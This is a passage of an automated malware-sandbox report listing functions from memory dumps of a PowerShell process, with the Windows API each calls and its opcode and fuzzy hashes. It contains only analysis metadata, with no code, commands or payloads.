                                                        • Opcode ID: 2d8a22c0066cc4c7e878289f72d35a3907268de4929a7c70766a224bc54b3970
                                                        • Instruction ID: 8584dae42afa2bcd2a5cc53b197084cb951c317be8146320108cf751e4212b76
                                                        • Opcode Fuzzy Hash: 2d8a22c0066cc4c7e878289f72d35a3907268de4929a7c70766a224bc54b3970
                                                        • Instruction Fuzzy Hash: 421107759006099FCB10CFA9D844BDEFBF9EF48314F14881AE619A7250D775AA50CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0018D01C, Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2159945890.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fa29575dc8dc9b962eaf3d4a2596aaff6b4ade267aa0578cf5472136f8aca784
                                                        • Instruction ID: fc3f2c510e83a50ac11f54b731c001f2de7e8991fecf1cbcf042f8aaa3d472f4
                                                        • Opcode Fuzzy Hash: fa29575dc8dc9b962eaf3d4a2596aaff6b4ade267aa0578cf5472136f8aca784
                                                        • Instruction Fuzzy Hash: 4121F575604304DFDB14EF64E884B26BB65EB84314F20C9A9E84A4B386C336D957CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0018D017, Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2159945890.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 946f52d015dba9bf56d0e9c0be5d249f1ec5587dd5124915a46d44fb8664578e
                                                        • Instruction ID: 4b2a2a3ff9675762a46b95b8f30ae26879453ab6aaf0c215458f4a4cfc06888f
                                                        • Opcode Fuzzy Hash: 946f52d015dba9bf56d0e9c0be5d249f1ec5587dd5124915a46d44fb8664578e
                                                        • Instruction Fuzzy Hash: 1411BE75504384CFCB11CF10E584B15BB61FB44314F24C6A9E8494B696C33AD90ACFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 2328 Parent PID: 2692 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01D0ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D0AD37
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: ab11a965b123bcb9633af7a85cb9f2cb9a28fb811d23a2e2c787d14ef14393f4
                                                        • Instruction ID: fd8fc6bcab1ac192645f5832cc233b38c1f3ce898fa8cc0f7dbcdd21d2f3b36d
                                                        • Opcode Fuzzy Hash: ab11a965b123bcb9633af7a85cb9f2cb9a28fb811d23a2e2c787d14ef14393f4
                                                        • Instruction Fuzzy Hash: C421D3765097809FEB138F25DC44B92BFF4EF06310F0985DAE9848B1A3E2319908DB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D0AD37
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 2aeee74cbc4ccf3a3b29b53dda81240ce8a96360cf4e10de4f615c1401ee12a3
                                                        • Instruction ID: e277fbc988207be6ec79733d15fa76f8ae431e602cfca9f1b31bc39bb0724b1c
                                                        • Opcode Fuzzy Hash: 2aeee74cbc4ccf3a3b29b53dda81240ce8a96360cf4e10de4f615c1401ee12a3
                                                        • Instruction Fuzzy Hash: D9115E765007049FEB21CF59D884B96FBE4EF08321F08C5AAED498B662E371E414DB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D0B329
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: a0947c9fae7f1525e38575a77ae17b7704905c08ddfde4284530e83b0595a204
                                                        • Instruction ID: 8c3fe7c7242253fe9008c42b3710408935f0d32510327f1c712c442477d52889
                                                        • Opcode Fuzzy Hash: a0947c9fae7f1525e38575a77ae17b7704905c08ddfde4284530e83b0595a204
                                                        • Instruction Fuzzy Hash: 99119E75508380AFDB228F15DC45F52FFB4EF46220F09849AED884B663D275A818DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D0B329
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 82f44de2dfe2071d65a712cc4eb867d35b63604b8647a6271900b5eaf12d2458
                                                        • Instruction ID: 9b516750e4c113df3402ed38a1226fa5d99a6e382df1634499311a46625850bc
                                                        • Opcode Fuzzy Hash: 82f44de2dfe2071d65a712cc4eb867d35b63604b8647a6271900b5eaf12d2458
                                                        • Instruction Fuzzy Hash: 5C01AD36404700DFEB22DF09D885B25FBA0EF08720F18C09AED890B662D375E418DB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 025F099C
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 66e17a781b0515267a34ff6cd1db76f0bfe7081861853d0764ebc56c2a7d1dd2
                                                        • Instruction ID: 46b43b4d213b574730dc601c23cb18c75ffc5152e2037bee632e640355447e02
                                                        • Opcode Fuzzy Hash: 66e17a781b0515267a34ff6cd1db76f0bfe7081861853d0764ebc56c2a7d1dd2
                                                        • Instruction Fuzzy Hash: 1EF0AF35904740DFEB609F05D985765FFA0EF14721F08C0DADE494B35AE275A504CAA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 025F01D0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 141c0cc0d834ece2d81753b6537f234472ac16e428fac4f941783ab735cc4265
                                                        • Instruction ID: b126ce721f3c470f6a636895d0c511b2a10a8e32274408a00131a8bce9017670
                                                        • Opcode Fuzzy Hash: 141c0cc0d834ece2d81753b6537f234472ac16e428fac4f941783ab735cc4265
                                                        • Instruction Fuzzy Hash: 4D31357650E3C09FE7138B759C65692BFB4AF43210F0E84DBD984CF1A3D6299809DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 025F072D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 586d6a33b736a4d6f8d9270bd2ae2894d39a58e30400a23a6d1fa05464fbf724
                                                        • Instruction ID: 06865a1ffc34ab44003ae08a797c4bf3b04c663ddb97f0bf7189154b55883b93
                                                        • Opcode Fuzzy Hash: 586d6a33b736a4d6f8d9270bd2ae2894d39a58e30400a23a6d1fa05464fbf724
                                                        • Instruction Fuzzy Hash: 79315071509380AFE722CF65CC85F56BFF8EF05210F09859EE9898B293D365A908CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 025F0DD6
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 72a43c1671b7c0c560532261a971f74bcd03b29653f45f40843f54e803989376
                                                        • Instruction ID: fe3646cc53319d435de95e21c6d17df4e7855d27e6446a811e63431619497a58
                                                        • Opcode Fuzzy Hash: 72a43c1671b7c0c560532261a971f74bcd03b29653f45f40843f54e803989376
                                                        • Instruction Fuzzy Hash: 8331C8B1509380AFE712CB25DC45B96BFE8EF06314F0884AAE944CF293D375A909C776
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: e10fb1e478ed4ba8e972b6c0668ad2be8a32373c097e9e7b0e61acc1548bb823
                                                        • Instruction ID: a90a8c9a257526bbc9895ab8409c5dc5354f987898b01528c96dcfedcc194f67
                                                        • Opcode Fuzzy Hash: e10fb1e478ed4ba8e972b6c0668ad2be8a32373c097e9e7b0e61acc1548bb823
                                                        • Instruction Fuzzy Hash: F231B172409380AFE722CB60CC45F96BFB8EF06310F0885DBF984DB192D224A908C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 270951918e2ecfdfc9b12595afe0cd534244d957c62ffd543600be07f79ef039
                                                        • Instruction ID: b4c96daf6900b913a80278dc46500ed4dd01f9e356ce5881bdb2d99b745ca1ba
                                                        • Opcode Fuzzy Hash: 270951918e2ecfdfc9b12595afe0cd534244d957c62ffd543600be07f79ef039
                                                        • Instruction Fuzzy Hash: 9D2191B2509380AFE712CB24DC45B96BFB8EF06320F0885DBE985DB193D265A949C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 025F109E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 1fd3b4819cabf8cc28b00f4bb9af064f94c87a9c4908d3c29564ca98045e7a2e
                                                        • Instruction ID: ff3a967e0318096de37a282a45f318c5b09077ebfd461ebc6db36ca93618bf5f
                                                        • Opcode Fuzzy Hash: 1fd3b4819cabf8cc28b00f4bb9af064f94c87a9c4908d3c29564ca98045e7a2e
                                                        • Instruction Fuzzy Hash: D9316F7550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD8848F2A3D629A909C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: aec53453f09f7c5f7757c28b3a95bce93046fdb7413fb19b79496a933ae8c1e3
                                                        • Instruction ID: 27d6fc00e2c28bf9986e667c2da927f7757456960e8390c3eeb00e8d013f3271
                                                        • Opcode Fuzzy Hash: aec53453f09f7c5f7757c28b3a95bce93046fdb7413fb19b79496a933ae8c1e3
                                                        • Instruction Fuzzy Hash: 9E21A175509380AFE722CF15CC45FA6BFB8EF46220F0884ABF945DB192D664E908CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0A1A8, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01D0A23E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        • Opcode ID: 60baa842b5a27766b6aac3461d7a9282f32a66fe3098256d45e347f71e886e37
                                                        • Instruction ID: 47404c3977e7078cecfc1c05a661b7fd33710742348b217ed020f1b69835d768
                                                        • Opcode Fuzzy Hash: 60baa842b5a27766b6aac3461d7a9282f32a66fe3098256d45e347f71e886e37
                                                        • Instruction Fuzzy Hash: A221A37140E7C06FD3138B258C55B66BFB4EF47620F1981DBE884CF193D229A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 025F0819
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: b6ca2df3f3d7b4ff102f061089e59f16d62d009bc7d3a94b0b7ab6d5bce5e681
                                                        • Instruction ID: 8ddc3211e34af454c7f31b5ff9386e9fd07ea3667393338d3ef8c07d9989c2f6
                                                        • Opcode Fuzzy Hash: b6ca2df3f3d7b4ff102f061089e59f16d62d009bc7d3a94b0b7ab6d5bce5e681
                                                        • Instruction Fuzzy Hash: 002107B6408780AFE712CB159C41FA3BFB8EF46720F0881DBF9848B197D224A909C775
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 025F0502
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 488508dd7e4d1189ac03838a3bb050cccc31020057531229b502a28f140918f0
                                                        • Instruction ID: c02eee82c5cde84378246e4e856b456af35f67728ce512227116e8a3847b8a71
                                                        • Opcode Fuzzy Hash: 488508dd7e4d1189ac03838a3bb050cccc31020057531229b502a28f140918f0
                                                        • Instruction Fuzzy Hash: 2521607540E3C0AFD3128B258C55B66BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 025F072D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: e2de1b98a78a6672b0f9554b1b1161f040767ef50a0b0864dfed1bd45b54c55d
                                                        • Instruction ID: 1922ea9ad441d877fb377943da46d5133b14688372e93efaa9a75b8ea495b9cc
                                                        • Opcode Fuzzy Hash: e2de1b98a78a6672b0f9554b1b1161f040767ef50a0b0864dfed1bd45b54c55d
                                                        • Instruction Fuzzy Hash: 04219171500300EFE720DF65CC45B66FBE8EF04210F0884A9E9498B296D371E404CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 025F08E5
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 9bfece1db84e7188ef0cfcb6543e4d28d4146dc743eaa40c900780140941ba2d
                                                        • Instruction ID: a5b3fa26a569d100cfefb68eb5c0197d0028b02c4c11372fad2c99b4dea2640c
                                                        • Opcode Fuzzy Hash: 9bfece1db84e7188ef0cfcb6543e4d28d4146dc743eaa40c900780140941ba2d
                                                        • Instruction Fuzzy Hash: 0621C172409380AFE722CF10DC45F96BFB8EF06310F0984DBE9848B193C225A909CB76
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D0A94A
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: bd7290f8622dc36e2c05030d4ffc844bb4c8d709fb5f07a517f52d2262a0cabb
                                                        • Instruction ID: 1c6ba44819df95176cf18ab1c0bbf79f6b59ef2e0ba7bf745f357c7e6ecd4c2f
                                                        • Opcode Fuzzy Hash: bd7290f8622dc36e2c05030d4ffc844bb4c8d709fb5f07a517f52d2262a0cabb
                                                        • Instruction Fuzzy Hash: 3221A77540D780AFD3138B25DC51B62BFB4EF87720F0981DBE8848B653D224A919C7B6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 025F0DD6
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: e3a2bdd18ba8f7a95e27df969a746f805ca4d6c7a8ae85bcad8323d21fea4125
                                                        • Instruction ID: 5740fc2c0df6a66d4c06be3050369a7eb6a1169984450ccecb7dba9cbf7bf215
                                                        • Opcode Fuzzy Hash: e3a2bdd18ba8f7a95e27df969a746f805ca4d6c7a8ae85bcad8323d21fea4125
                                                        • Instruction Fuzzy Hash: E6218471500244AFF760DF25DC85B56FBD8EF04614F08846AE948DB286D775E904CA65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 45fba13ca75c0ca1d2c894f4b50c1df2e0cb8620177992f52e80c580ffdefe69
                                                        • Instruction ID: 8f801a536b5b544cc5fb5bdbbc929a7063018e764fc6648fe30dedb40848f1e7
                                                        • Opcode Fuzzy Hash: 45fba13ca75c0ca1d2c894f4b50c1df2e0cb8620177992f52e80c580ffdefe69
                                                        • Instruction Fuzzy Hash: B4119D76500304EFEB22DF55DC85FAAFBA8EF04320F04856AF9499A181D670E9448BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 142370e8a5af39a530dbccce46407f5353699d042802f2e21d72469fa1216a50
                                                        • Instruction ID: 767f2e5d9524d0ac90c5ffe0dbfca616741997ac09e06db81900306a53be20cd
                                                        • Opcode Fuzzy Hash: 142370e8a5af39a530dbccce46407f5353699d042802f2e21d72469fa1216a50
                                                        • Instruction Fuzzy Hash: 4811AF75604300EFFB21CF15DC85FAABBA8EF05320F04846AE949CB681D670E9048A71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: a328169b27c8f5b2d0e0abf383c1d0d94615bca682cb1cda7e3eb97509a7bd57
                                                        • Instruction ID: 6a5e67d3a13ac06d8bc8518e91b72e344b4be154abcda5ff7f8d10079db059ea
                                                        • Opcode Fuzzy Hash: a328169b27c8f5b2d0e0abf383c1d0d94615bca682cb1cda7e3eb97509a7bd57
                                                        • Instruction Fuzzy Hash: 2D2192725047809FEB21CF25DC45B96FFF4EF46220F0884DEED858B562D235A449DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 025F0FB0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 8ce59b730c00f803f74df554aed285db80d49e4e5b061ca6fcb64b382637a325
                                                        • Instruction ID: 5e4f6d1e74d470d88a71fb749bea62dca403b7e0274c17f047c6a604d54f68f9
                                                        • Opcode Fuzzy Hash: 8ce59b730c00f803f74df554aed285db80d49e4e5b061ca6fcb64b382637a325
                                                        • Instruction Fuzzy Hash: 6B215B7150D3C09FDB528B25DC95B92BFB4AF03224F0D84DAE9888F297D2659808CB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D0BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 4db5eb0fafd49f8793989b69976a57bcff58df1dcb7d8d238a7f72d22772dd96
                                                        • Instruction ID: 25e215ad999ac7de832d71012fbc58cfd35be92e0f178e4fa23095ef74589285
                                                        • Opcode Fuzzy Hash: 4db5eb0fafd49f8793989b69976a57bcff58df1dcb7d8d238a7f72d22772dd96
                                                        • Instruction Fuzzy Hash: E42192765093C09FEB128B25DC55B92BFB4EF07310F0984DBDD858F163D2249908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D0AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: cc6c42d65ba2994bdbf656be6feca02abf04bce8c7d4999fd5cf71d4b12d3c55
                                                        • Instruction ID: 08ab755b188b2329b20158e6e8f9508cd6522e47583290e605a80d19844b4c2e
                                                        • Opcode Fuzzy Hash: cc6c42d65ba2994bdbf656be6feca02abf04bce8c7d4999fd5cf71d4b12d3c55
                                                        • Instruction Fuzzy Hash: 432142716053809FE722CF29DC45B56BFE8EF56610F0884AAED49DB293D265E804CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025F10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 025F1148
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 32de29cd21fc1c136cef9dd9c11f1404f8cf82764709b321427bc392eb2c7114
                                                        • Instruction ID: 883980463cb60480ba5f48adf6fd06a5af90e7ebbc8f92c99aa7b76de2d0bca7
                                                        • Opcode Fuzzy Hash: 32de29cd21fc1c136cef9dd9c11f1404f8cf82764709b321427bc392eb2c7114
                                                        • Instruction Fuzzy Hash: A5216D6140D7C0AFE7138B25DC54A62BFB4EF57720F0980DBD9888F2A3D2695808D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 23426ab5309618e2c6d5b5b69d85a7cf81f3c735f4208f3d07f33df8bbaa1c54
                                                        • Instruction ID: 5e7daede5153803cd76904305eb2bb135ad7e2896b57b421d3ff4a5325729770
                                                        • Opcode Fuzzy Hash: 23426ab5309618e2c6d5b5b69d85a7cf81f3c735f4208f3d07f33df8bbaa1c54
                                                        • Instruction Fuzzy Hash: DD11C472500300EFFB22DF55DC85FAAFBA8EF44720F14846AFD498B181D670A9048BB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D0BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
